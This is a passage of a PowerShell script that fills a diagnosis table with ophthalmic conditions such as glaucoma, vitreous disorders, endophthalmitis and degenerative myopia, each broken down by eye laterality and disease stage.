$DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, bilateral","Capsular glaucoma with pseudoexfoliation of lens, bilateral, mild stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, bilateral","Capsular glaucoma with pseudoexfoliation of lens, bilateral, moderate stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, bilateral","Capsular glaucoma with pseudoexfoliation of lens, bilateral, severe stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, bilateral","Capsular glaucoma with pseudoexfoliation of lens, bilateral, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, unspecified eye","Capsular glaucoma with pseudoexfoliation of lens, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, unspecified eye","Capsular glaucoma with pseudoexfoliation of lens, unspecified eye, mild stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, unspecified eye","Capsular glaucoma with pseudoexfoliation of lens, unspecified eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, unspecified eye","Capsular glaucoma with pseudoexfoliation of lens, unspecified eye, severe stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, unspecified eye","Capsular glaucoma with pseudoexfoliation of lens, unspecified eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Residual stage of open-angle glaucoma","Residual stage of open-angle glaucoma, right eye") + $null = $DiagnosisList.Rows.Add("Residual stage of open-angle glaucoma","Residual stage of open-angle glaucoma, left eye") + $null = $DiagnosisList.Rows.Add("Residual stage of open-angle glaucoma","Residual stage of open-angle glaucoma, bilateral") + $null = $DiagnosisList.Rows.Add("Residual stage of open-angle glaucoma","Residual stage of open-angle glaucoma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified primary angle-closure glaucoma","Unspecified primary angle-closure glaucoma, stage unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified primary angle-closure glaucoma","Unspecified primary angle-closure glaucoma, mild stage") + $null = $DiagnosisList.Rows.Add("Unspecified primary angle-closure glaucoma","Unspecified primary angle-closure glaucoma, moderate stage") + $null = $DiagnosisList.Rows.Add("Unspecified primary angle-closure glaucoma","Unspecified primary angle-closure glaucoma, severe stage") + $null = $DiagnosisList.Rows.Add("Unspecified primary angle-closure glaucoma","Unspecified primary angle-closure glaucoma, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Acute angle-closure glaucoma","Acute angle-closure glaucoma, right eye") + $null = $DiagnosisList.Rows.Add("Acute angle-closure glaucoma","Acute angle-closure glaucoma, left eye") + $null = $DiagnosisList.Rows.Add("Acute angle-closure glaucoma","Acute angle-closure glaucoma, bilateral") + $null = $DiagnosisList.Rows.Add("Acute angle-closure glaucoma","Acute angle-closure glaucoma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, right eye","Chronic angle-closure glaucoma, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, right eye","Chronic angle-closure glaucoma, right eye, mild stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, right eye","Chronic angle-closure glaucoma, right eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, right eye","Chronic angle-closure glaucoma, right eye, severe stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, right eye","Chronic angle-closure glaucoma, right eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, left eye","Chronic angle-closure glaucoma, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, left eye","Chronic angle-closure glaucoma, left eye, mild stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, left eye","Chronic angle-closure glaucoma, left eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, left eye","Chronic angle-closure glaucoma, left eye, severe stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, left eye","Chronic angle-closure glaucoma, left eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, bilateral","Chronic angle-closure glaucoma, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, bilateral","Chronic angle-closure glaucoma, bilateral, mild stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, bilateral","Chronic angle-closure glaucoma, bilateral, moderate stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, bilateral","Chronic angle-closure glaucoma, bilateral, severe stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, bilateral","Chronic angle-closure glaucoma, bilateral, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, unspecified eye","Chronic angle-closure glaucoma, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, unspecified eye","Chronic angle-closure glaucoma, unspecified eye, mild stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, unspecified eye","Chronic angle-closure glaucoma, unspecified eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, unspecified eye","Chronic angle-closure glaucoma, unspecified eye, severe stage") + $null = $DiagnosisList.Rows.Add("Chronic angle-closure glaucoma, unspecified eye","Chronic angle-closure glaucoma, unspecified eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Intermittent angle-closure glaucoma","Intermittent angle-closure glaucoma, right eye") + $null = $DiagnosisList.Rows.Add("Intermittent angle-closure glaucoma","Intermittent angle-closure glaucoma, left eye") + $null = $DiagnosisList.Rows.Add("Intermittent angle-closure glaucoma","Intermittent angle-closure glaucoma, bilateral") + $null = $DiagnosisList.Rows.Add("Intermittent angle-closure glaucoma","Intermittent angle-closure glaucoma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Residual stage of angle-closure glaucoma","Residual stage of angle-closure glaucoma, right eye") + $null = $DiagnosisList.Rows.Add("Residual stage of angle-closure glaucoma","Residual stage of angle-closure glaucoma, left eye") + $null = $DiagnosisList.Rows.Add("Residual stage of angle-closure glaucoma","Residual stage of angle-closure glaucoma, bilateral") + $null = $DiagnosisList.Rows.Add("Residual stage of angle-closure glaucoma","Residual stage of angle-closure glaucoma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, unspecified eye","Glaucoma secondary to eye trauma, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, unspecified eye","Glaucoma secondary to eye trauma, unspecified eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, unspecified eye","Glaucoma secondary to eye trauma, unspecified eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, unspecified eye","Glaucoma secondary to eye trauma, unspecified eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, unspecified eye","Glaucoma secondary to eye trauma, unspecified eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, right eye","Glaucoma secondary to eye trauma, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, right eye","Glaucoma secondary to eye trauma, right eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, right eye","Glaucoma secondary to eye trauma, right eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, right eye","Glaucoma secondary to eye trauma, right eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, right eye","Glaucoma secondary to eye trauma, right eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, left eye","Glaucoma secondary to eye trauma, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, left eye","Glaucoma secondary to eye trauma, left eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, left eye","Glaucoma secondary to eye trauma, left eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, left eye","Glaucoma secondary to eye trauma, left eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, left eye","Glaucoma secondary to eye trauma, left eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, bilateral","Glaucoma secondary to eye trauma, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, bilateral","Glaucoma secondary to eye trauma, bilateral, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, bilateral","Glaucoma secondary to eye trauma, bilateral, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, bilateral","Glaucoma secondary to eye trauma, bilateral, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye trauma, bilateral","Glaucoma secondary to eye trauma, bilateral, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, unspecified eye","Glaucoma secondary to eye inflammation, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, unspecified eye","Glaucoma secondary to eye inflammation, unspecified eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, unspecified eye","Glaucoma secondary to eye inflammation, unspecified eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, unspecified eye","Glaucoma secondary to eye inflammation, unspecified eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, unspecified eye","Glaucoma secondary to eye inflammation, unspecified eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, right eye","Glaucoma secondary to eye inflammation, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, right eye","Glaucoma secondary to eye inflammation, right eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, right eye","Glaucoma secondary to eye inflammation, right eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, right eye","Glaucoma secondary to eye inflammation, right eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, right eye","Glaucoma secondary to eye inflammation, right eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, left eye","Glaucoma secondary to eye inflammation, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, left eye","Glaucoma secondary to eye inflammation, left eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, left eye","Glaucoma secondary to eye inflammation, left eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, left eye","Glaucoma secondary to eye inflammation, left eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, left eye","Glaucoma secondary to eye inflammation, left eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, bilateral","Glaucoma secondary to eye inflammation, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, bilateral","Glaucoma secondary to eye inflammation, bilateral, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, bilateral","Glaucoma secondary to eye inflammation, bilateral, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, bilateral","Glaucoma secondary to eye inflammation, bilateral, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to eye inflammation, bilateral","Glaucoma secondary to eye inflammation, bilateral, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, unspecified eye","Glaucoma secondary to other eye disorders, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, unspecified eye","Glaucoma secondary to other eye disorders, unspecified eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, unspecified eye","Glaucoma secondary to other eye disorders, unspecified eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, unspecified eye","Glaucoma secondary to other eye disorders, unspecified eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, unspecified eye","Glaucoma secondary to other eye disorders, unspecified eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, right eye","Glaucoma secondary to other eye disorders, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, right eye","Glaucoma secondary to other eye disorders, right eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, right eye","Glaucoma secondary to other eye disorders, right eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, right eye","Glaucoma secondary to other eye disorders, right eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, right eye","Glaucoma secondary to other eye disorders, right eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, left eye","Glaucoma secondary to other eye disorders, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, left eye","Glaucoma secondary to other eye disorders, left eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, left eye","Glaucoma secondary to other eye disorders, left eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, left eye","Glaucoma secondary to other eye disorders, left eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, left eye","Glaucoma secondary to other eye disorders, left eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, bilateral","Glaucoma secondary to other eye disorders, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, bilateral","Glaucoma secondary to other eye disorders, bilateral, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, bilateral","Glaucoma secondary to other eye disorders, bilateral, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, bilateral","Glaucoma secondary to other eye disorders, bilateral, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to other eye disorders, bilateral","Glaucoma secondary to other eye disorders, bilateral, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, unspecified eye","Glaucoma secondary to drugs, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, unspecified eye","Glaucoma secondary to drugs, unspecified eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, unspecified eye","Glaucoma secondary to drugs, unspecified eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, unspecified eye","Glaucoma secondary to drugs, unspecified eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, unspecified eye","Glaucoma secondary to drugs, unspecified eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, right eye","Glaucoma secondary to drugs, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, right eye","Glaucoma secondary to drugs, right eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, right eye","Glaucoma secondary to drugs, right eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, right eye","Glaucoma secondary to drugs, right eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, right eye","Glaucoma secondary to drugs, right eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, left eye","Glaucoma secondary to drugs, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, left eye","Glaucoma secondary to drugs, left eye, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, left eye","Glaucoma secondary to drugs, left eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, left eye","Glaucoma secondary to drugs, left eye, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, left eye","Glaucoma secondary to drugs, left eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, bilateral","Glaucoma secondary to drugs, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, bilateral","Glaucoma secondary to drugs, bilateral, mild stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, bilateral","Glaucoma secondary to drugs, bilateral, moderate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, bilateral","Glaucoma secondary to drugs, bilateral, severe stage") + $null = $DiagnosisList.Rows.Add("Glaucoma secondary to drugs, bilateral","Glaucoma secondary to drugs, bilateral, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Glaucoma with increased episcleral venous pressure","Glaucoma with increased episcleral venous pressure, right eye") + $null = $DiagnosisList.Rows.Add("Glaucoma with increased episcleral venous pressure","Glaucoma with increased episcleral venous pressure, left eye") + $null = $DiagnosisList.Rows.Add("Glaucoma with increased episcleral venous pressure","Glaucoma with increased episcleral venous pressure, bilateral") + $null = $DiagnosisList.Rows.Add("Glaucoma with increased episcleral venous pressure","Glaucoma with increased episcleral venous pressure, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hypersecretion glaucoma","Hypersecretion glaucoma, right eye") + $null = $DiagnosisList.Rows.Add("Hypersecretion glaucoma","Hypersecretion glaucoma, left eye") + $null = $DiagnosisList.Rows.Add("Hypersecretion glaucoma","Hypersecretion glaucoma, bilateral") + $null = $DiagnosisList.Rows.Add("Hypersecretion glaucoma","Hypersecretion glaucoma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Aqueous misdirection","Aqueous misdirection, right eye") + $null = $DiagnosisList.Rows.Add("Aqueous misdirection","Aqueous misdirection, left eye") + $null = $DiagnosisList.Rows.Add("Aqueous misdirection","Aqueous misdirection, bilateral") + $null = $DiagnosisList.Rows.Add("Aqueous misdirection","Aqueous misdirection, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified glaucoma","Other specified glaucoma") + $null = $DiagnosisList.Rows.Add("Unspecified glaucoma","Unspecified glaucoma") + $null = $DiagnosisList.Rows.Add("Glaucoma in diseases classified elsewhere","Glaucoma in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Vitreous prolapse","Vitreous prolapse, unspecified eye") + $null = $DiagnosisList.Rows.Add("Vitreous prolapse","Vitreous prolapse, right eye") + $null = $DiagnosisList.Rows.Add("Vitreous prolapse","Vitreous prolapse, left eye") + $null = $DiagnosisList.Rows.Add("Vitreous prolapse","Vitreous prolapse, bilateral") + $null = $DiagnosisList.Rows.Add("Vitreous hemorrhage","Vitreous hemorrhage, unspecified eye") + $null = $DiagnosisList.Rows.Add("Vitreous hemorrhage","Vitreous hemorrhage, right eye") + $null = $DiagnosisList.Rows.Add("Vitreous hemorrhage","Vitreous hemorrhage, left eye") + $null = $DiagnosisList.Rows.Add("Vitreous hemorrhage","Vitreous hemorrhage, bilateral") + $null = $DiagnosisList.Rows.Add("Crystalline deposits in vitreous body","Crystalline deposits in vitreous body, unspecified eye") + $null = $DiagnosisList.Rows.Add("Crystalline deposits in vitreous body","Crystalline deposits in vitreous body, right eye") + $null = $DiagnosisList.Rows.Add("Crystalline deposits in vitreous body","Crystalline deposits in vitreous body, left eye") + $null = $DiagnosisList.Rows.Add("Crystalline deposits in vitreous body","Crystalline deposits in vitreous body, bilateral") + $null = $DiagnosisList.Rows.Add("Vitreous membranes and strands","Vitreous membranes and strands, right eye") + $null = $DiagnosisList.Rows.Add("Vitreous membranes and strands","Vitreous membranes and strands, left eye") + $null = $DiagnosisList.Rows.Add("Vitreous membranes and strands","Vitreous membranes and strands, bilateral") + $null = $DiagnosisList.Rows.Add("Vitreous membranes and strands","Vitreous membranes and strands, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other vitreous opacities","Other vitreous opacities, right eye") + $null = $DiagnosisList.Rows.Add("Other vitreous opacities","Other vitreous opacities, left eye") + $null = $DiagnosisList.Rows.Add("Other vitreous opacities","Other vitreous opacities, bilateral") + $null = $DiagnosisList.Rows.Add("Other vitreous opacities","Other vitreous opacities, unspecified eye") + $null = $DiagnosisList.Rows.Add("Vitreous degeneration","Vitreous degeneration, right eye") + $null = $DiagnosisList.Rows.Add("Vitreous degeneration","Vitreous degeneration, left eye") + $null = $DiagnosisList.Rows.Add("Vitreous degeneration","Vitreous degeneration, bilateral") + $null = $DiagnosisList.Rows.Add("Vitreous degeneration","Vitreous degeneration, unspecified eye") + $null = $DiagnosisList.Rows.Add("Vitreomacular adhesion","Vitreomacular adhesion, right eye") + $null = $DiagnosisList.Rows.Add("Vitreomacular adhesion","Vitreomacular adhesion, left eye") + $null = $DiagnosisList.Rows.Add("Vitreomacular adhesion","Vitreomacular adhesion, bilateral") + $null = $DiagnosisList.Rows.Add("Vitreomacular adhesion","Vitreomacular adhesion, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other disorders of vitreous body","Other disorders of vitreous body") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of vitreous body","Unspecified disorder of vitreous body") + $null = $DiagnosisList.Rows.Add("Unspecified purulent endophthalmitis","Unspecified purulent endophthalmitis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified purulent endophthalmitis","Unspecified purulent endophthalmitis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified purulent endophthalmitis","Unspecified purulent endophthalmitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified purulent endophthalmitis","Unspecified purulent endophthalmitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Panophthalmitis (acute)","Panophthalmitis (acute), right eye") + $null = $DiagnosisList.Rows.Add("Panophthalmitis (acute)","Panophthalmitis (acute), left eye") + $null = $DiagnosisList.Rows.Add("Panophthalmitis (acute)","Panophthalmitis (acute), bilateral") + $null = $DiagnosisList.Rows.Add("Panophthalmitis (acute)","Panophthalmitis (acute), unspecified eye") + $null = $DiagnosisList.Rows.Add("Vitreous abscess (chronic)","Vitreous abscess (chronic), right eye") + $null = $DiagnosisList.Rows.Add("Vitreous abscess (chronic)","Vitreous abscess (chronic), left eye") + $null = $DiagnosisList.Rows.Add("Vitreous abscess (chronic)","Vitreous abscess (chronic), bilateral") + $null = $DiagnosisList.Rows.Add("Vitreous abscess (chronic)","Vitreous abscess (chronic), unspecified eye") + $null = $DiagnosisList.Rows.Add("Panuveitis","Panuveitis, right eye") + $null = $DiagnosisList.Rows.Add("Panuveitis","Panuveitis, left eye") + $null = $DiagnosisList.Rows.Add("Panuveitis","Panuveitis, bilateral") + $null = $DiagnosisList.Rows.Add("Panuveitis","Panuveitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Parasitic endophthalmitis, unspecified","Parasitic endophthalmitis, unspecified, right eye") + $null = $DiagnosisList.Rows.Add("Parasitic endophthalmitis, unspecified","Parasitic endophthalmitis, unspecified, left eye") + $null = $DiagnosisList.Rows.Add("Parasitic endophthalmitis, unspecified","Parasitic endophthalmitis, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Parasitic endophthalmitis, unspecified","Parasitic endophthalmitis, unspecified, unspecified eye") + $null = $DiagnosisList.Rows.Add("Sympathetic uveitis","Sympathetic uveitis, right eye") + $null = $DiagnosisList.Rows.Add("Sympathetic uveitis","Sympathetic uveitis, left eye") + $null = $DiagnosisList.Rows.Add("Sympathetic uveitis","Sympathetic uveitis, bilateral") + $null = $DiagnosisList.Rows.Add("Sympathetic uveitis","Sympathetic uveitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other endophthalmitis","Other endophthalmitis") + $null = $DiagnosisList.Rows.Add("Degenerative myopia","Degenerative myopia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia","Degenerative myopia, right eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia","Degenerative myopia, left eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia","Degenerative myopia, bilateral") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with choroidal neovascularization","Degenerative myopia with choroidal neovascularization, right eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with choroidal neovascularization","Degenerative myopia with choroidal neovascularization, left eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with choroidal neovascularization","Degenerative myopia with choroidal neovascularization, bilateral eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with choroidal neovascularization","Degenerative myopia with choroidal neovascularization, unspecified eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with macular hole","Degenerative myopia with macular hole, right eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with macular hole","Degenerative myopia with macular hole, left eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with macular hole","Degenerative myopia with macular hole, bilateral eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with macular hole","Degenerative myopia with macular hole, unspecified eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with retinal detachment","Degenerative myopia with retinal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with retinal detachment","Degenerative myopia with retinal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with retinal detachment","Degenerative myopia with retinal detachment, bilateral eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with retinal detachment","Degenerative myopia with retinal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with foveoschisis","Degenerative myopia with foveoschisis, right eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with foveoschisis","Degenerative myopia with foveoschisis, left eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with foveoschisis","Degenerative myopia with foveoschisis, bilateral eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with foveoschisis","Degenerative myopia with foveoschisis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with other maculopathy","Degenerative myopia with other maculopathy, right eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with other maculopathy","Degenerative myopia with other maculopathy, left eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with other maculopathy","Degenerative myopia with other maculopathy, bilateral eye") + $null = $DiagnosisList.Rows.Add("Degenerative myopia with other maculopathy","Degenerative myopia with other maculopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other and unspecified degenerative disorders of globe","Unspecified degenerative disorder of globe") + $null = $DiagnosisList.Rows.Add("Chalcosis","Chalcosis, right eye") + $null = $DiagnosisList.Rows.Add("Chalcosis","Chalcosis, left eye") + $null = $DiagnosisList.Rows.Add("Chalcosis","Chalcosis, bilateral") + $null = $DiagnosisList.Rows.Add("Chalcosis","Chalcosis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Siderosis of eye","Siderosis of eye, right eye") + $null = $DiagnosisList.Rows.Add("Siderosis of eye","Siderosis of eye, left eye") + $null = $DiagnosisList.Rows.Add("Siderosis of eye","Siderosis of eye, bilateral") + $null = $DiagnosisList.Rows.Add("Siderosis of eye","Siderosis of eye, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other degenerative disorders of globe","Other degenerative disorders of globe, right eye") + $null = $DiagnosisList.Rows.Add("Other degenerative disorders of globe","Other degenerative disorders of globe, left eye") + $null = $DiagnosisList.Rows.Add("Other degenerative disorders of globe","Other degenerative disorders of globe, bilateral") + $null = $DiagnosisList.Rows.Add("Other degenerative disorders of globe","Other degenerative disorders of globe, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hypotony of eye","Unspecified hypotony of eye") + $null = $DiagnosisList.Rows.Add("Flat anterior chamber hypotony of eye","Flat anterior chamber hypotony of right eye") + $null = $DiagnosisList.Rows.Add("Flat anterior chamber hypotony of eye","Flat anterior chamber hypotony of left eye") + $null = $DiagnosisList.Rows.Add("Flat anterior chamber hypotony of eye","Flat anterior chamber hypotony of eye, bilateral") + $null = $DiagnosisList.Rows.Add("Flat anterior chamber hypotony of eye","Flat anterior chamber hypotony of unspecified eye") + $null = $DiagnosisList.Rows.Add("Hypotony of eye due to ocular fistula","Hypotony of right eye due to ocular fistula") + $null = $DiagnosisList.Rows.Add("Hypotony of eye due to ocular fistula","Hypotony of left eye due to ocular fistula") + $null = $DiagnosisList.Rows.Add("Hypotony of eye due to ocular fistula","Hypotony of eye due to ocular fistula, bilateral") + $null = $DiagnosisList.Rows.Add("Hypotony of eye due to ocular fistula","Hypotony of unspecified eye due to ocular fistula") + $null = $DiagnosisList.Rows.Add("Hypotony of eye due to other ocular disorders","Hypotony of eye due to other ocular disorders, right eye") + $null = $DiagnosisList.Rows.Add("Hypotony of eye due to other ocular disorders","Hypotony of eye due to other ocular disorders, left eye") + $null = $DiagnosisList.Rows.Add("Hypotony of eye due to other ocular disorders","Hypotony of eye due to other ocular disorders, bilateral") + $null = $DiagnosisList.Rows.Add("Hypotony of eye due to other ocular disorders","Hypotony of eye due to other ocular disorders, unspecified eye") + $null = $DiagnosisList.Rows.Add("Primary hypotony of eye","Primary hypotony of right eye") + $null = $DiagnosisList.Rows.Add("Primary hypotony of eye","Primary hypotony of left eye") + $null = $DiagnosisList.Rows.Add("Primary hypotony 